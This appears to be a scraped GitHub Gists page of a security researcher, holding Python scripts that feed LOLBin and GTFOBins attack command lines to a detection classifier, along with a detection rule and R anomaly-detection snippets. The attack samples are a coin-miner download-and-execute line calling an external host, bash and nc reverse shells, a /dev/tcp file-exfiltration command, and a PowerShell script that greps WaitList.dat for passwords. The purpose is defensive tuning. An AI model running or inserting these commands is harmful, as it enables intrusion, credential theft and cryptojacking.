Russ McRee holisticinfosec

View GitHub Profile
# LOLBINS coin miner commands from https://lolbas-project.github.io/
# LOLBINS rundll32 execution: https://lolbas-project.github.io/lolbas/Binaries/Rundll32/#execute
# LOLBINS regsvr32 execution: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/#execute
# References:
# WannaMine: https://www.accenture.com/_acnmedia/pdf-46/accenture-threat-analysis-monero-wannamine.pdf
# https://logrhythm.com/blog/how-to-enable-process-creation-events-to-track-malware-and-threat-actor-activity/
#
# Feeds documented Windows LOLBin / coin-miner command lines to the LOLC classifier so its
# verdicts and tags can be checked against known samples (a detection-tuning aid).
from lol.api import LOLC, PlatformType
# Classifier instance; the platform selects which command-line conventions it expects.
lolc=LOLC(PlatformType.WINDOWS) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
# NOTE(review): the `commands` list that follows carries Windows paths such as
# root\Subscription and %temp%\y1.bat inside non-raw string literals; `\S` and `\y` are not
# valid Python escapes (newer interpreters warn on them), so raw strings (r'...') would make
# the intended bytes unambiguous before they reach the classifier.
commands=['cmd /c echo powershell -nop $a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(SCM Event Filter)))) {IEX(New-Object Net.WebClient).DownloadString(http://stafftest.spdns.eu:8000/mate6.ps1)} >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR %temp%\y1.bat &&SCHTASKS /run /TN yas
holisticinfosec / LOLC_FileUploads.py
Created December 28, 2021 05:14
from GTFOBins: file uploads (exfil) examples via bash, rlogin, and whois
# from GTFOBins: file uploads (exfil) examples via bash, rlogin, and whois
# https://gtfobins.github.io/#+file%20upload
#
# Feeds GTFOBins "file upload" command lines to the LOLC classifier so its verdicts and tags
# can be compared against documented samples; the $LFILE/$RHOST/$RPORT placeholders are
# kept verbatim from GTFOBins.
from lol.api import LOLC, PlatformType
# Classifier instance; the platform selects which command-line conventions it expects.
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
# NOTE(review): the first entry is a non-raw literal, so its `\n\n` becomes two real newline
# characters inside the string. If the classifier is meant to see the backslash sequence that
# `echo -e` interprets at run time, this needs a raw string (r'...') — confirm which form LOLC expects.
commands=['bash -c echo -e POST / HTTP/0.9\n\n$(<$LFILE) > /dev/tcp/$RHOST/$RPORT',
'rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST',
'whois -h $RHOST -p $RPORT base64 $LFILE']
# Unpacked into two parallel sequences that the zip() loop below pairs with `commands`.
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
holisticinfosec / LOLC_ReverseShells.py
Created December 28, 2021 05:13
from GTFOBins: reverse shell examples via nc, gimp, and bash
# from GTFOBins: reverse shell examples via nc, gimp, and bash
# https://gtfobins.github.io/#+reverse%20shell
#
# Feeds GTFOBins "reverse shell" command lines to the LOLC classifier so its verdicts and tags
# can be compared against documented samples; the $RHOST/$RPORT placeholders are kept
# verbatim from GTFOBins.
from lol.api import LOLC, PlatformType
# Classifier instance; the platform selects which command-line conventions it expects.
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['nc -e /bin/sh $RHOST $RPORT',
'gimp -idf --batch-interpreter=python-fu-eval -b import sys,socket,os,pty;s=socket.socket()',
'bash -c exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1']
# Unpacked into two parallel sequences that the zip() loop below pairs with `commands`.
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
[
{
"title": "NOBELLIUM FoggyWeb File Drop Sysmon",
"description": "After compromising an AD FS server, NOBELIUM was observed dropping version.dll on the system.",
"author": "Russ McRee (holisticinfosec), Florian Roth, (@cyb3rops)",
"tags": [
"attack.persistence",
"attack.defense_evasion"
],
"level": "critical",
holisticinfosec / sim_toolsmith_demo.xml
Created February 22, 2021 00:07
Sim toolsmith demo
<?xml version="1.0" encoding="utf-8"?>
<sim>
<delete>false</delete>
<errordirectory>C:\Users\Public\Documents\</errordirectory>
<task>
<config>
<name>PowerShell_test</name>
<loop>3</loop>
<pause>1000</pause>
</config>
holisticinfosec / WaitList.dat.ps1
Created September 19, 2018 23:04
Barnaby Skeggs's WaitList.dat PowerShell enumerator
# Barnaby Skeggs's WaitList.dat enumerator: stop the Windows Search indexer, pause briefly,
# then scan the current user's WaitList.dat (UTF-16) for the string "password".
# Stopping SearchIndexer presumably releases the file for reading — TODO confirm; terminating
# that process needs the right to kill it (typically an elevated session).
Stop-Process -Name "SearchIndexer" -Force
Start-Sleep -Milliseconds 500
$waitListPath = Join-Path $env:USERPROFILE 'AppData\Local\Microsoft\InputPersonalization\TextHarvester\WaitList.dat'
# Select-String emits one MatchInfo per matching line; "unicode" selects UTF-16LE decoding.
Select-String -Path $waitListPath -Encoding unicode -Pattern "password"
holisticinfosec / SERVER-549521_Anomalies_Twitter+GESD.R
Last active June 16, 2018 18:25
SERVER-549521 Anomalies Twitter + GESD Methods
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
# Get only SERVER549521 access
# Subset the time-aware access log to one server and drop the per-server grouping
# (presumably so later decomposition runs over a single series rather than per group).
# NOTE(review): the match string here is "SERVER-549521" (hyphenated), while a sibling snippet
# on this page filters on "SERVER549521"; only one spelling can match the data — confirm.
SERVER549521 <- security_access_logs %>%
filter(server == "SERVER-549521") %>%
ungroup()
# Anomalize!!
SERVER549521 %>%
# Twitter + GESD
time_decompose(count, method = "twitter", trend = "4 months") %>%
holisticinfosec / Decomposition_Anomalized_Downloads.R
Last active June 3, 2018 22:48
Decomposition of Anomalized SERVER-549521 Downloads
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
# Filter the access log to one server, decompose the `count` series with time_decompose(),
# score the `remainder` component with anomalize(), and plot the decomposition.
# NOTE(review): this filters on "SERVER549521" while the plot title (and a sibling snippet on
# this page) use "SERVER-549521"; if the data carries the hyphenated name this yields no rows.
security_access_logs %>%
filter(server == "SERVER549521") %>%
ungroup() %>%
# No method/trend arguments: anomalize package defaults apply here
time_decompose(count) %>%
anomalize(remainder) %>%
plot_anomaly_decomposition() +
labs(title = "Decomposition of Anomalized SERVER-549521 Downloads")
holisticinfosec / SERVER-549521_Anomalies_STL+IQR.R
Last active June 3, 2018 22:46
SERVER-549521 Anomalies STL + IQR Methods
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
# Flag and plot anomalies in the per-server series `SERVER549521` (built in a separate
# snippet): STL decomposition with a 4-month trend window, IQR scoring of the remainder,
# then time_recompose() so plot_anomalies() can draw on the recomposed series
# (time_recomposed = TRUE).
SERVER549521 %>%
# STL + IQR Anomaly Detection
time_decompose(count, method = "stl", trend = "4 months") %>%
anomalize(remainder, method = "iqr") %>%
time_recompose() %>%
# Anomaly Visualization
plot_anomalies(time_recomposed = TRUE) +
labs(title = "SERVER-549521 Anomalies", subtitle = "STL + IQR Methods")
holisticinfosec / Security_Access_Logs_Function.R
Last active June 3, 2018 21:57
Security Access Logs Function
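# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
#
# Build `security_access_logs`, the time-aware tibble the anomaly snippets consume:
# read log.csv, group rows by server, and index the table on its `date` column.
library(dplyr)
library(readr)       # read_csv() is readr's; neither dplyr nor tibbletime attach it, so a fresh session failed here
library(tibbletime)
# Hard-coded working directory: log.csv is resolved relative to this path.
setwd("C:/coding/R/anomalize/")
logs <- read_csv("log.csv")
security_access_logs <- logs %>%
  group_by(server) %>%
  as_tbl_time(date)   # `date` becomes the time index for time_decompose()
# Echo the result so the structure can be inspected interactively.
security_access_logs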